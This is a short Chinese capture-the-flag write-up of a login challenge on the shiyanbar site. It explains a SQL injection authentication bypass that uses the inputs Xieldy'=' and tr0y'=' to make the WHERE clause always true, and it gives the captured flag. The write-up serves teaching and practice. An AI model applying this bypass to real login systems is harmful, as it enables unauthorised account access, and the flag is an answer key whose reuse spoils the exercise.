实验吧 登陆一下好吗??

实验吧 登陆一下好吗??

题目链接：http://www.shiyanbar.com/ctf/1942

题目大意：登录http://ctf5.shiyanbar.com/web/wonderkun/web/index.html获取flag.

SQL注入

假设sql语句如下为：select * from user where username='用户名' and password='密码'.

当username='用户名'的值和password='密码'的值均为1时，语句相当于select * from user where 1 and 1也等于 select * from user.

因此只需要构造"用户名"和"密码"使得username='用户名'的值和password='密码'的值均为1既可.

例如：

username输入Xieldy'='，password输入tr0y'='，使得语句为select * from user where username='Xieldy'='' and password='tr0y'=''，

对于username='Xieldy'=''，从左到右运算，先计算username='Xieldy'.一般数据库里不会有'Xieldy'，故该值为0.

再计算0=''，得到值为1.

password='tr0y'=''同理.

FLAG：ctf{51d1bf8fb65a8c2406513ee8f52283e7}.